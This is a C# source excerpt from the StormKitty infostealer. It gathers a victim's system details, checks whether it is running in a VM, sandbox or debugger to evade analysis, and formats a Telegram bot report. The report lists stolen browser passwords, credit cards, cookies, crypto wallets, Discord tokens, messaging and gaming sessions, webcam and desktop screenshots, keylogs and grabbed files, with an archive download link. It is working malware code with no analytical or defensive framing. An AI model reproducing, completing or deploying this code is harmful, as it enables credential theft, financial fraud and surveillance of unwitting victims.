public static void Save(string sSavePath) { try { string SystemInfoText = ("" + "\n[IP]" + "\nExternal IP: " + SystemInfo.GetPublicIP() + "\nInternal IP: " + SystemInfo.GetLocalIP() + "\nGateway IP: " + SystemInfo.GetDefaultGateway() + "\n" + "\n[Machine]" + "\nUsername: "******"\nCompname: " + SystemInfo.compname + "\nSystem: " + SystemInfo.GetSystemVersion() + "\nCPU: " + SystemInfo.GetCPUName() + "\nGPU: " + SystemInfo.GetGPUName() + "\nRAM: " + SystemInfo.GetRamAmount() + "\nDATE: " + SystemInfo.datenow + "\nSCREEN: " + SystemInfo.ScreenMetrics() + "\nBATTERY: " + SystemInfo.GetBattery() + "\nWEBCAMS COUNT: " + WebcamScreenshot.GetConnectedCamerasCount() + "\n" + "\n[Virtualization]" + "\nVirtualMachine: " + AntiAnalysis.VirtualBox() + "\nSandBoxie: " + AntiAnalysis.SandBox() + "\nEmulator: " + AntiAnalysis.Emulator() + "\nDebugger: " + AntiAnalysis.Debugger() + "\nProcesse: " + AntiAnalysis.Processes() + "\nHosting: " + AntiAnalysis.Hosting() + "\nAntivirus: " + SystemInfo.GetAntivirus() + "\n"); System.IO.File.WriteAllText(sSavePath, SystemInfoText); } catch (System.Exception ex) { Logging.Log("SysInfo >> Failed fetch system info\n" + ex); } }
/// <summary> /// Format system information for sending to telegram bot /// </summary> /// <returns>String with formatted system information</returns> private static void SendSystemInfo(string url) { UploadKeylogs(); // Get info string info = ("" + "\n ๐น *StormKitty - Report:*" + "\nDate: " + SystemInfo.datenow + "\nSystem: " + SystemInfo.GetSystemVersion() + "\nUsername: "******"\nCompName: " + SystemInfo.compname + "\nLanguage: " + Flags.GetFlag(SystemInfo.culture.Split('-')[1]) + " " + SystemInfo.culture + "\nAntivirus: " + SystemInfo.GetAntivirus() + "\n" + "\n ๐ป *Hardware:*" + "\nCPU: " + SystemInfo.GetCPUName() + "\nGPU: " + SystemInfo.GetGPUName() + "\nRAM: " + SystemInfo.GetRamAmount() + "\nPower: " + SystemInfo.GetBattery() + "\nScreen: " + SystemInfo.ScreenMetrics() + "\nWebcams count: " + WebcamScreenshot.GetConnectedCamerasCount() + "\n" + "\n ๐ก *Network:* " + "\nGateway IP: " + SystemInfo.GetDefaultGateway() + "\nInternal IP: " + SystemInfo.GetLocalIP() + "\nExternal IP: " + SystemInfo.GetPublicIP() + "\n" + SystemInfo.GetLocation() + "\n" + "\n ๐ธ *Domains info:*" + Counter.GetLValue("๐ฆ *Banking services*", Counter.DetectedBankingServices, '-') + Counter.GetLValue("๐ฐ *Cryptocurrency services*", Counter.DetectedCryptoServices, '-') + Counter.GetLValue("๐จ *Social networks*", Counter.DetectedSocialServices, '-') + Counter.GetLValue("๐ *P**n websites*", Counter.DetectedPornServices, '-') + GetKeylogsHistory() + "\n" + "\n ๐ *Browsers:*" + Counter.GetIValue("๐ Passwords", Counter.Passwords) + Counter.GetIValue("๐ณ CreditCards", Counter.CreditCards) + Counter.GetIValue("๐ช Cookies", Counter.Cookies) + Counter.GetIValue("๐ AutoFill", Counter.AutoFill) + Counter.GetIValue("โณ History", Counter.History) + Counter.GetIValue("๐ Bookmarks", Counter.Bookmarks) + Counter.GetIValue("๐ฆ Downloads", Counter.Downloads) + "\n" + "\n ๐ *Software:*" + Counter.GetIValue("๐ฐ Wallets", Counter.Wallets) + Counter.GetIValue("๐ก FTP hosts", Counter.FTPHosts) + Counter.GetIValue("๐ VPN accounts", Counter.VPN) + Counter.GetIValue("๐ฆข Pidgin accounts", Counter.Pidgin) + Counter.GetSValue("๐ซ Outlook accounts", Counter.Outlook) + Counter.GetSValue("โ๏ธ Telegram sessions", Counter.Telegram) + Counter.GetSValue("โ๏ธ Skype session", Counter.Skype) + Counter.GetSValue("๐ฌ Discord token", Counter.Discord) + Counter.GetSValue("๐ฎ Steam session", Counter.Steam) + Counter.GetSValue("๐ฎ Uplay session", Counter.Uplay) + Counter.GetSValue("๐ฎ BattleNET session", Counter.BattleNET) + "\n" + "\n ๐งญ *Device:*" + Counter.GetSValue("๐ Windows product key", Counter.ProductKey) + Counter.GetIValue("๐ฐ Wifi networks", Counter.SavedWifiNetworks) + Counter.GetSValue("๐ธ Webcam screenshot", Counter.WebcamScreenshot) + Counter.GetSValue("๐ Desktop screenshot", Counter.DesktopScreenshot) + "\n" + "\n ๐ฆ *Installation:*" + Counter.GetBValue(Config.Autorun == "1" && (Counter.BankingServices || Counter.CryptoServices), "โ Startup installed", "โ๏ธ Startup disabled") + Counter.GetBValue(Config.ClipperModule == "1" && Counter.CryptoServices && Config.Autorun == "1", "โ Clipper installed", "โ๏ธ Clipper not installed") + Counter.GetBValue(Config.KeyloggerModule == "1" && Counter.BankingServices && Config.Autorun == "1", "โ Keylogger installed", "โ๏ธ Keylogger not installed") + "\n" + "\n ๐ *File Grabber:*" + ((Config.GrabberModule != "1") ? "\n โ โ๏ธ Disabled in configuration" : "") + Counter.GetIValue("๐ Images", Counter.GrabberImages) + Counter.GetIValue("๐ Documents", Counter.GrabberDocuments) + Counter.GetIValue("๐ Database files", Counter.GrabberDatabases) + Counter.GetIValue("๐ Source code files", Counter.GrabberSourceCodes) + "\n" + $"\n๐ [Archive download link]({url})" + "\n๐ *Archive password is*: \"_" + Implant.StringsCrypt.ArchivePassword + "\"_" ); int last = GetLatestMessageId(); if (last != -1) { EditMessage(info, last); } else { SetLatestMessageId(SendMessage(info)); } }